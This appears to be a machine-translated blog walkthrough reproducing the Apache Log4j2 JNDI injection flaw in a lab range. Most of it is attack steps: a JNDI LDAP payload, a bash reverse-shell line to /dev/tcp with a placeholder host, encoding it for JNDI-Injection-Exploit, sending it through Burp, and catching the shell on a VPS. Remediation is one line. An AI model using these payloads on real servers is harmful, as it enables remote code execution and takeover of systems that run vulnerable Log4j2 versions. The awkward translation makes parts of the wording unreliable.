Statement

This article is only used for technology research and vulnerability recurrence learning , Do not use the article attack method in unauthorized field tests , Any consequences have nothing to do with this article and the author ！

One 、 Product Brief

Apache Log4j2 It's a · be based on Java The logging tool for , The tool rewrites Log4j frame , And introduce a lot of rich features , The log framework is widely used in business system development , Used to record log information .

Two 、 Summary of vulnerability

because Log4j2 Component exists while processing program logging JNDI Injection defects , An unauthorized attacker can exploit this vulnerability , Carefully constructed malicious data can be sent to the target server , Trigger Log4j2 Component resolution defect , Implement arbitrary code execution of the target server , Get target server permissions .

3、 ... and 、 scope

Apache Log4j2 2.0-beta9 To 2.15.0

Four 、 Loophole recurrence

With vulfocus Range environment test
Open the range interface

Burp Grab the bag , Use it directly payload To test , see dnslog Whether there is echo payload: ${jndi:ldap://X.X.X.X/TomcatBypass/TomcatEcho}

Dnslog The platform has data echo , Since there is echo , Then direct actual combat rebound Shell.

The tools used next ：JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar（github download ）

Speaking of rebound Shell, First of all, I want to use bash -i >& /dev/tcp/X.X.X.X/X 0>&1, But it can't be used directly here , Need to put payoad Conduct base64 encryption , And then use bash Order to execute

Recommend an encrypted website ：https://www.bugku.net/runtime-exec-payloads/

Input bounce above bash command , The encrypted payload.
Will this period of bash The command is applied directly to JNDIExploit On tools , The interface after execution is as follows ：

here JNDI Links It is selected and implemented according to the current experimental environment payload
stay vps Create a monitor on

go back to burp On , Use it directly payload To test , Remember to put payload Conduct URL code , Because this is GET request , Directly in burp Inside Decoder Code conversion in the module

After coding payload Put it in repeater in send send out

Vps There is a lot of echo data , Let's look at the listening port , Has rebounded successfully Shell

5、 ... and 、 Means of repair

Update to the latest official version ！

6、 ... and 、 Reference article

https://nosec.org/home/detail/4920.html